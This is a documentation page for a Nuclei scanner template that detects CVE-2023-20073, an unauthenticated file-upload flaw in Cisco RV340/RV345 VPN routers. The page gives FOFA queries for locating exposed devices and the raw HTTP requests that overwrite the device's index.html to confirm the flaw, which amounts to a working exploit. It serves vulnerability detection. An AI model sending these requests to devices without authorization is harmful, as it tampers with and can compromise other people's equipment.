Cisco VPN Routers - Unauthenticated Arbitrary File Upload
ID: CVE-2023-20073
Severity: critical
Author: princechaddha,ritikchaddha
Tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive
Description
Section titled “Description”A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
YAML Source
Section titled “YAML Source”id: CVE-2023-20073
info: name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload author: princechaddha,ritikchaddha severity: critical description: | A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. impact: | Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. remediation: | Apply the latest security patches provided by Cisco to mitigate this vulnerability. reference: - https://unsafe.sh/go-173464.html - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f - https://github.com/RegularITCat/CVE-2023-20073/tree/main - https://nvd.nist.gov/vuln/detail/CVE-2023-20073 - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20073 cwe-id: CWE-434 epss-score: 0.37606 epss-percentile: 0.972 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cisco product: rv340_firmware fofa-query: - app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" - app="cisco-rv340" || app="cisco-rv340w" || app="cisco-rv345" || app="cisco-rv345p" tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusivevariables: html_comment: "<!-- {{randstr}} -->" # Random string as HTML comment to append in response body
http: - raw: - | GET /index.html HTTP/1.1 Host: {{Hostname}} - | POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1 Host: {{Hostname}} Authorization: 1 Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf
--------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="pathparam"
Portal --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="fileparam"
index.html --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="file.path"
index.html --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="file"; filename="index.html" Content-Type: application/octet-stream
{{index}} {{html_comment}}
--------------------------f6f99e26f3a45adf-- - | GET /index.html HTTP/1.1 Host: {{Hostname}}
extractors: - type: dsl name: index internal: true dsl: - body_1 matchers: - type: word part: body_3 words: - "{{html_comment}}"# digest: 4b0a00483046022100bd8d65ba30d0fbaf6e8cf0a84827858d52187e66e2a0380ff393257bb8df5da00221008ca93cc04973e649ff0f68ee3a78ca56e44ff953cde048c9199f512ee21640a3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-20073.yaml"